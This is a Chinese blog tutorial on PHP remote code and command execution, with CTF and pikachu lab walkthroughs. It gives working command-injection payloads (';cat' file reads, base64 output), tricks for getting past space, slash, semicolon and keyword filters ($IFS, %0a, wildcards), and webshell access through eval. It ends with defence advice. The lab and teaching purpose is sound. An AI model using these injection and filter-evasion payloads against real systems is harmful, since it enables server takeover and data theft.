系列2:13、远程代码执行(RCE)漏洞相关

最新推荐文章于 2024-04-06 06:00:00 发布
最新推荐文章于 2024-04-06 06:00:00 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: web安全 安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44704184/article/details/124229188
版权

远程代码执行

可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。

一、漏洞危害

1、获取服务器权限
2、获取敏感数据文件
3、写入恶意文件getshell
4、植入木马病毒勒索软件等

二、PHP RCE涉及函数

1、命令command注入

在这里插入图片描述

2、代码code注入

在这里插入图片描述

3、Windows命令拼接符号

在这里插入图片描述

4、Linux命令拼接符号

在这里插入图片描述

三、示例:(pikachu靶场)

1、ping

127.0.0.1 & ipconfig

在这里插入图片描述

2、evel

phpinfo();    
也可以直接用蚁剑连接

在这里插入图片描述
在这里插入图片描述

四、实践(ctfhub rce相关练习)

1、eval执行

在这里插入图片描述
(1)看到有eval函数,直接上蚁剑。
在这里插入图片描述
(2)蚁剑只看到一个文件
在这里插入图片描述
(3)查看当前目录只发现一个文件,切换到根目录下查看,发现flag文件。

2、命令注入

(1)查看代码没有任何过滤,直接查看目录文件

127.0.0.1;ls

(2)发现一个php文件,cat访问。

127.0.0.1;cat 27046314332967.php

在这里插入图片描述
(3)访问后页面没有显示,查看网页源代码发现flag。
在这里插入图片描述
(4)第二种方法,也可以加密显示。

127.0.0.1;cat 27046314332967.php|base64

在这里插入图片描述

3、过滤cat

(1)观察代码发现过滤到了cat,所以在访问文件时需要使用cat的代替命令。

在这里插入图片描述

显示相关命令

cat由第一行开始显示内容,并将所有内容输出
tac从最后—行倒序显示内容,并将所有内容输出
more根据窗口大小,一页一页的显示文件内容
less 和more类似。但其优点可以往前翻页,而且进行可以搜索字符
head 只显示头几行
tail只显示最后几行
nl类似于cat -n,显示时输出行号
tailf 类似于tail -f

4、过滤空格

(1)观察代码发现过滤到了空格,所以在访问文件时需要使用空格的代替命令。
在这里插入图片描述

空格的各种形式

使用IFSS9、%09、<、>、<>、{,}、%20、${IFS)来代替空格

5、过滤目录分隔符

(1)观察代码发现过滤了目录分割符,所以在访问文件时需要使用代替命令。
在这里插入图片描述
(2)使用;组合多条命令。

127.0.0.1;cd flag_is_here;cat flag_1814925829678.php

在这里插入图片描述
在这里插入图片描述

6、综合练习

(1)过滤了很多的关键字,需要一一替换。
在这里插入图片描述
(2);的替换:%0a回车**%0d**换行

127.0.0.1%0als

(3)flag的替换:使用f***

127.0.0.1%0acd${IFS}f*** _is here%0als

127.0.0.1%0acd${IFS}f***_is_here%0amore${IFS}f***_20021218031292.php

五、漏洞防御

1、开源框架,升级到最新版本
2、尽量不要使用命令执行的函数
3、如果必须使用,需要做白名单处理
4、用正则表达式对用户输入的内容进行处理
5、使用WAF

凌晨四点的代码
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
远程代码执行RCE
7hinkSource的博客
08-18 302
条件 程序中含有可以执行php代码的函数或者语言结构 传入的参数可控,可直接修改或影响 导致代码注入的函数 eval():将字符串当做php代码执行 <?php if(isset($_GET['code'])){ $code=$_GET['code']; eval($code); } ?>//?code=phpinfo(); assert():将字符串当做php代码执行 <?php if(isset($_GET['code'])){ $code=$_GET['code'
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
fastjson-rce-exploit poc for fastjson远程执行代码漏洞
php探针入侵,【防护方案】Yii2 反序列化远程命令执行漏洞 (CVE-2020-15148)
weixin_36012511的博客
03-28 792
一、综述近日监测到,Yii Framework 2 在其 9月14 日发布的更新日志中公布了一个反序列化远程命令执行漏洞(CVE-2020-15148)。官方通过给yii\db\BatchQueryResult类加上__wakeup()函数,禁用了yii\db\BatchQueryResult的反序列化,阻止了应用程序对任意用户输入调用’unserialize()’造成的远程命令执行。Yii2 是...
web安全-4-远程代码执行漏洞 RCE
最新发布
qq_57410330的博客
04-06 952
远程代码执行漏洞详情
RCE(远程代码/命令执行漏洞)原理及靶场练习
记录学习,一起进步
12-15 510
RCE(远程代码/命令执行漏洞)原理及靶场练习
山东大学软件学院项目实训-创新实训-山大软院网络攻防靶场实验平台(八)-RCE漏洞
m0_47470899的博客
03-23 4417
目录前言:1、RCE 漏洞简介1.1、简介1.2、危害1.3、利用1.3.1、漏洞挖掘1.3.2、windows下管道符1.3.3、linux下管道符1.4、防范2、相关配置3、编写“RCE 漏洞”后端代码4、编写“RCE 漏洞”前端代码5、运行测试参考文章 前言: 1、RCE 漏洞简介 1.1、简介 RCE (Remote Code/Command Execute) :远程代码/命令执行 漏洞产生原因:在 Web 应用中开发者为了灵活性,简洁性等会让应用调用代码或者系统命令执行函数去处理,同时没有考虑用
RCE远程控制漏洞(上)
hmysn的博客
06-22 910
目录什么是RCE远程控制漏洞漏洞的危害:PHP 会造成RCE执行漏洞相关函数:linux的命令拼接符号:RCE漏洞作为漏洞中比较常见的一个,近年来在apache和python等等软件上都出现过巨大的bug,本篇文章对于RCE漏洞将会进行一个简单的介绍,关于什么是RCERCE的危害以及一些我们在寻找RCE漏洞时所需要的简单的一些基础知识的了解和预备,下一篇文章将会在靶场中对于这个漏洞相关问题进行实操!...
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞(CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
Struts2-RCE:Burp Extender用于检查struts 2 RCE漏洞
04-15
描述此burp扩展有助于识别struts2 Web应用程序中的Struts2远程代码执行漏洞。 此Burp扩展程序检测以下18个RCE,它们是S2-001 S2-007 S2-008 S2-012 S2-013 S2-014 S2-015 S2-016 S2-019 S2-029 S2-032 S2-033 S2-037...
sapConfigServlet_rce:检查 SAP ConfigServlet 未经身份验证的远程代码执行漏洞
06-28
sapConfigServlet_rce 一个简单的python脚本,用于检查SAP ConfigServlet远程未经身份验证的远程代码执行漏洞
Spring Rce 漏洞分析CVE-2022-22965
god_Zeo的安全博客
04-07 1万+
0x01 漏洞介绍 Spring Framework 是一个开源的轻量级J2EE应用程序开发框架。 3月31日,VMware发布安全公告,修复了Spring Framework中的远程代码执行漏洞(CVE-2022-22965)。在 JDK 9 及以上版本环境下,可以利用此漏洞在未授权的情况下在目标系统上写入恶意程序从而远程执行任意代码。 0x02 影响范围 影响组件:org.springframework:spring-beans 影响版本:< 5.3.18 和 < 5.2.20.RELEAS
pikachu之RCE
qq_43665434的博客
02-12 938
pikachu之RCE 一、神魔是RCERCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 1、远程系统命令执行 出现原因:因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。 比如常见的路由器、防火墙、入侵检测等设备的web管理界面上,一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。而如果设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“
pikachu笔记1
sizhijiejie的博客
11-30 176
pikachu学习笔记_1
Webmin 远程代码执行Getshell漏洞复现 编号:CVE-2022-0824
╲ゞ紅桃K
08-31 1997
Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。webmin1.990之前版本存在权限提升漏洞,该漏洞源于错误的程序对高级本地过程调用。攻击者可以利用该漏洞能够修改操作系统文件系统并以运行应用程序权限执行操作系统命令。......
远程命令、代码执行RCE漏洞
weixin_43858799的博客
05-13 4283
一、RCE介绍: RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界...
CVE-2022-22965:Spring远程代码执行漏洞
热门推荐
一只爱吃橙子的羊
04-09 3万+
CVE-2022-22965:Spring Framework远程代码执行漏洞
Joomla远程代码执行漏洞分析
stonesharp的专栏
12-19 4070
说一下这个漏洞的影响和触发、利用方法。这个漏洞影响Joomla 1.5 to 3.4全版本,并且利用漏洞无需登录,只需要发送两次数据包即可(第一次:将session插入数据库中,第二次发送同样的数据包来取出session、触发漏洞执行任意代码),后果是直接导致任意代码执行。 0x00 漏洞点 —— 反序列化session 这个漏洞存在于反序列化session的过程中。 漏洞
远程 命令/代码 执行(remote command/code execute)漏洞总结
未完成的歌~的博客
08-20 8040
这周来学习下命令执行漏洞;命令执行漏洞是用户通过浏览器在远程服务器执行任意系统命令,与代码执行漏洞没有太大的区别,不过我们在学习时还是要区分不同的概念。关于代码执行漏洞会在下篇博客中详述。 一、什么是命令执行漏洞: 应用有时需要调用一些执行系统命令的函数,如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数中的参数时...
远程代码执行漏洞RCE原理
03-28
远程代码执行漏洞(Remote Code Execution,RCE)是指攻击者通过利用程序或系统中的漏洞,成功地在远程主机上执行自己编写或者上传的恶意代码。攻击者可以利用这个漏洞执行系统命令、上传或下载文件、获取敏感信息等,从而对系统进行攻击。 RCE漏洞的原理是攻击者在程序或系统中注入恶意代码,并且成功执行代码,从而实现攻击目的。攻击者通常利用程序或系统中的安全漏洞,比如未经过滤的用户输入、未授权的访问、缓冲区溢出等进行攻击,通过给予恶意代码执行权限,轻松地控制远程主机。 RCE漏洞的危害非常大,攻击者可以通过该漏洞远程控制系统,获取敏感信息,甚至篡改系统中的数据。因此,对于程序开发人员和系统管理员来说,必须要重视漏洞的防范和修复工作,及时更新补丁,加强安全防护,从而有效地防范远程代码执行漏洞的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值